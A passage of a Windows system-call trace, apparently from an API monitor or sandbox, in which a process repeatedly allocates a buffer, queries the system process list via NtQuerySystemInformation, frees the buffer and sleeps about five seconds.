SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.761] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.762] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.762] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.766] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.767] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.769] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.770] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.770] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.775] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.776] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.777] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.779] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.784] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.785] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.787] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.787] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.788] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.789] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.793] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.794] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.798] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.798] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.802] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.803] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.805] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.806] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.806] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.811] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.812] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.815] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.816] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.820] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.821] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.823] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.824] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.825] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.829] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.830] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.832] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.834] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.834] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.839] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.841] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.843] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.847] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.848] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.850] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.851] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.852] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.852] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.857] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.858] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.860] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.861] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.861] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.862] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.866] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.867] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.869] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.869] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.871] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.871] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.871] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.876] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.877] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.879] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.881] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.881] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.881] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.913] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.914] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.916] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.921] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.922] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.922] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.922] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.927] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.928] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.929] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.931] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.931] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.937] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.938] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.940] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.940] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.941] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.942] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.942] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.947] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.948] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.950] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.950] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.951] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.951] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.955] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.956] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.957] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.957] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.958] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.958] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.961] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.961] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.964] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.967] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.968] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.969] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.970] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.970] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.970] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.974] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.974] 